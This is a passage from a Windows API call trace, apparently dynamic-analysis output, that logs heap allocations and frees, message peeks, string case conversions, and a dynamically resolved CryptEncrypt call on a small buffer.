0x2a69a90 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0124.274] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0124.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0124.275] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0124.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0124.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0124.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa210 [0124.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0124.275] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0124.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0124.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0124.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0124.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0124.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0124.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0124.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0124.275] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0124.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0124.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0124.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0124.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0124.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0124.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0124.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0124.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0124.275] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0124.275] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0124.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0124.275] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0124.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0124.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0124.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0124.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0124.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0124.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0124.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0124.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0124.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0124.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0124.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0124.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0124.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0124.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0124.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0124.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0124.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0124.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0124.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0124.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0124.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0124.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0124.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0124.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0124.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0124.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0124.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0124.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0124.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0124.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0124.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7040 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69730 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0124.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0124.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0124.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0124.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0124.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0124.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0124.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0124.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0124.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0124.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0124.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a684e8 [0124.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69a00 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0124.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0124.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0124.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0124.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0124.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a00 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0124.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0124.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0124.280] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0124.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0124.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0124.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0124.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa2a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0124.281] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0124.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0124.281] CryptEncrypt (in: hKey=0x9a43c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71ab8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71ab8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0124.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: 